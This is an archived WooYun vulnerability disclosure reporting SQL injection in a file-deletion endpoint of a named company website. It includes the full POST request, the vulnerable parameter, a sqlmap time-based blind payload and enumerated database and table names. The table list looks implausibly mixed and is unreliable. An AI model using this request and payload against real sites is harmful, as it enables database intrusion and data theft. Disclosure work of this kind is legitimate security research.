乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-13: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
哎 mysql < 5.0 跑表太慢
删除文件处 存在sql注入
POST /index.php HTTP/1.1Host: www.sdcofco.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: visiter=664f0be93cc1578c0b865c50c8dd793c; cck_lasttime=1449892098504; cck_count=1; PHPSESSID=da73cb59807cf1198dfa970268357a27; netosOlmb=mbid%3D8%7Cname%3Dadmin%7Cuserid%3D6336%7Cmbgid%3D2%7Cdoover%3D0X-Forwarded-For: 8.8.8.10Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 34id[0]=11&act=mbs&mo=netdisk&step=3
跑着跑着 被管家给清理了 看看日志吧 我从新抓的包 就不截图了
sqlmap identified the following injection point(s) with a total of 2777 HTTP(s) requests:---Parameter: id[0] (POST) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id[0]=11) AND 1726=BENCHMARK(5000000,MD5(0x44646a73)) AND (4960=4960&act=mbs&mo=netdisk&step=3---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.2.8back-end DBMS: MySQL <5.0.11sqlmap resumed the following injection point(s) from stored session:---Parameter: id[0] (POST) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id[0]=11) AND 1726=BENCHMARK(5000000,MD5(0x44646a73)) AND (4960=4960&act=mbs&mo=netdisk&step=3---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.2.8back-end DBMS: MySQL < 5.0.0available databases [1]:[*] netos_user_6A36sqlmap resumed the following injection point(s) from stored session:---Parameter: id[0] (POST) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id[0]=11) AND 1726=BENCHMARK(5000000,MD5(0x44646a73)) AND (4960=4960&act=mbs&mo=netdisk&step=3---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.2.8back-end DBMS: MySQL < 5.0.0Database: netos_user_6A36[57 tables]+-------------------------------+| ALL_USERS || DEPARTAMENTOS || DWE_Internal_Task_Attributes || M_CADASTRO_GERAL || PREFIX_search_engine || Population || Professoren || QRTZ_BLOB_TRIGGERS || Status || ThumbnailKeyword || UM_USER_ATTRIBUTES || account_multi || ad_ad || cdb_activities || cdb_banned || cdb_pluginhooks || child_config_traffic_selector || cmSiteNodeVersion || css_file || dtb_csv_sql || dtb_recommend_products || dw || egresado || friends || geo_desert || indexation || job_title || jos_vm_cart || jos_vm_order_user_info || jos_vm_waiting_list || lc_fields || lists || mpassword || mushroom_dataset || oil_biolmed_land || oil_content || perfil || pg_ts_dict || plugin || poll || pruefen || pwrd || sea || seq_gen || sys_options_cats || taikhoan || tb_login || tblOrders || tblusers || user_preferences || user_pw || usrpass || variable_interest || vcd_PornCategories || vcd_UserProperties || video || vis_typen |+-------------------------------+
过滤
危害等级:高
漏洞Rank:18
确认时间:2015-12-14 09:00
非常感谢,马上整改!
暂无